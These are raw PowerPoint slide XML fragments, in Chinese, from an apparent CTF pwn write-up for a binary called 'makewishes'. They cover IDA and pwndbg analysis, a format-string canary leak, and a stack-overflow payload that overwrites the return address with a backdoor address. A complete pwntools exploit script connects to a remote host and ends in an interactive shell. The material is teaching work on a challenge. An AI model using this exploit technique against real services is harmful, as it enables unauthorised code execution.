            <a:off x="466165" y="1085677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过程和分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1125340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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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6622B23-8D72-D4AB-5595-48C7880DE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5" y="1860049"/>
            <a:ext cx="11310086" cy="35412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B62F49-D93C-F4EA-6317-6B0BB8C12F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997" y="889803"/>
            <a:ext cx="8574350" cy="548172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1037D67-A450-0925-2530-91B3B134154B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1308847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过程和分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282777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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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CE09898-336C-66BB-A76F-54B8BEDFD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8" y="1617374"/>
            <a:ext cx="9739874" cy="26635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DFC29F-3E76-E0F6-53EA-903D4B339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07" y="4519576"/>
            <a:ext cx="6512580" cy="223941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E3E880B-C49A-7D08-2B28-B29421A7CE0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1171976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过程和分析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8821FF-44B7-B604-55A0-4A9F02A459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9884" y="1664278"/>
            <a:ext cx="8587836" cy="3977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48FAB9-06C9-3318-B417-F3CCA56BDB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9884" y="1610676"/>
            <a:ext cx="9030692" cy="39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0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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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D4628EA5-E10E-CA36-3E4D-102F34FE2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046" y="2029651"/>
            <a:ext cx="8845345" cy="38723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E3E880B-C49A-7D08-2B28-B29421A7CE0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1171976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构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload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035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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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8E3E880B-C49A-7D08-2B28-B29421A7CE0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1171976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构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload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1F8B4F-7DB1-4743-C228-455D01963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0840" y="1683827"/>
            <a:ext cx="7047984" cy="40851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29CC935-0599-870D-968D-E73D16639E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8444266" y="565817"/>
            <a:ext cx="523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ighlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>怎么解决</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>的问题？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359653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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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8E3E880B-C49A-7D08-2B28-B29421A7CE0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1171976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构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload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0FC910-0FA6-488A-09A9-540C1F450B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681438" y="1861216"/>
            <a:ext cx="30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read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（）函数处设置断点：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439535-9344-5BC0-4C9F-9BB13DFA42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63170"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947846" y="2218343"/>
            <a:ext cx="5976595" cy="16884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6E4DD54-0536-B6DE-D19F-8B65EEB675B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4135192"/>
            <a:ext cx="240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87F161B-9C25-3E3D-25C1-74F973404B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85"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1573586" y="4212821"/>
            <a:ext cx="8042328" cy="229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1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86"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（一）题目初探</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>静态分析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C19DE5-E14D-7A85-B0E4-72684E5A3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9165" y="1713983"/>
            <a:ext cx="1510553" cy="107551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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138518" y="1967854"/>
            <a:ext cx="831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拿到题目：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>下可执行文件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D74A3E-FFE3-F97E-C6B1-6A4DF0110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68" y="3323368"/>
            <a:ext cx="8347623" cy="21630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0B8014-69A6-C4DA-B97E-AADC04062AB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138518" y="3711388"/>
            <a:ext cx="2976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拖入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，反汇编</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19961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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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8E3E880B-C49A-7D08-2B28-B29421A7CE0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1171976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构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload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0FC910-0FA6-488A-09A9-540C1F450B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681438" y="1858596"/>
            <a:ext cx="30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查看栈空间：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6CDA73-2E02-F12E-5BC9-63E8B22C9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7" y="2371003"/>
            <a:ext cx="9076215" cy="31828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DBE75F3-2450-6611-70F6-89B7019E8513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686800" y="977152"/>
            <a:ext cx="227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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>N=8</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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6936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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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8E3E880B-C49A-7D08-2B28-B29421A7CE0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1171976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构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload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BE75F3-2450-6611-70F6-89B7019E8513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686800" y="977152"/>
            <a:ext cx="227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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>N=8</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highligh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ED619A-9306-0D45-7FB6-F10E3BD08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996" y="1812572"/>
            <a:ext cx="6972082" cy="40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3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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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8E3E880B-C49A-7D08-2B28-B29421A7CE0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1171976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构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload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BE75F3-2450-6611-70F6-89B7019E8513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686800" y="977152"/>
            <a:ext cx="227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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>N=8</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600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026D20-E918-9744-1D50-CE5CFD012974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138518" y="2418886"/>
            <a:ext cx="925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payload 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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b"a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"*0x28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p64(canary) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b'a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'*8 + p64(0x4011D6)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B6EDD8-3DD2-54E6-C48D-D7DCE15EEFF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671482" y="3562637"/>
            <a:ext cx="160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任意字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x28</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>覆盖局部变量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881EC0-6127-C3A6-2D8B-D1CFE71994EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796118" y="3540225"/>
            <a:ext cx="160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八位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>canary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669153-5471-33BB-B360-F2091495B8AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6696635" y="3465740"/>
            <a:ext cx="122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任意字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RBP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3A4490-83E4-7258-2E7B-0A060DEA7980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8318888" y="3414343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八位后门函数地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>覆盖返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2898075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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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8E3E880B-C49A-7D08-2B28-B29421A7CE0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1171976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构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload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5045EE-0780-B400-FBE4-90390B4F7382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1707776" y="1486613"/>
            <a:ext cx="987462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from pwn import *   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>引入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>p = remote(“59.110.164.72”, 10001)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>远程连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>p = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>“./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>makewishes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>)          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>本地</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>p.send(b“0”)                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>发送第一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>read</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>p.sendline(b“7”)                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#give a number</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>payload = b“%11$p”                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>canary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>p.send(payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>p.recvuntil(b"0x")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>canary = int(p.recv(16),16)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>p.sendline(b“2”)                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#give a number</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>payload = b"a"*0x28+p64(canary) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>b'a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>'*8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>+ p64(0x4011D6)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>p.sendline(payload)                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>覆盖返回地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>p.interactive()                                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>交互，拿到系统命令权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299569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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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8E3E880B-C49A-7D08-2B28-B29421A7CE0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537882" y="1171976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运行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63F501-90FF-1B25-70F3-F82847732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19" y="1096065"/>
            <a:ext cx="7618879" cy="572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49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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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2655FBB-4C96-9C22-CF62-402DAE1A5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483" y="1171976"/>
            <a:ext cx="6808351" cy="55024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16A7F5-C2DA-B74D-DE4F-DEA0503BF2DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546848" y="1171976"/>
            <a:ext cx="1192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调试版</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70312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（一）题目初探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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="1239621"/>
            <a:ext cx="831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分析题目逻辑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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B0D6E5F-3DAD-8952-B2CA-11F174CA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33" y="1065230"/>
            <a:ext cx="6727814" cy="57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6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（一）题目初探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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="1239621"/>
            <a:ext cx="8310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分析题目逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>begingame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a: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AE9B4E-D4A2-21F9-359D-DD90BE8A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94" y="2233718"/>
            <a:ext cx="8635482" cy="2983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67A8B6E-C446-C995-F0F0-C03380EB6114}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5020221" y="3242944"/>
              <a:ext cx="1334880" cy="212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67A8B6E-C446-C995-F0F0-C03380EB61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21" y="3233944"/>
                <a:ext cx="135252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43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（一）题目初探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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="1239621"/>
            <a:ext cx="8310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分析题目逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
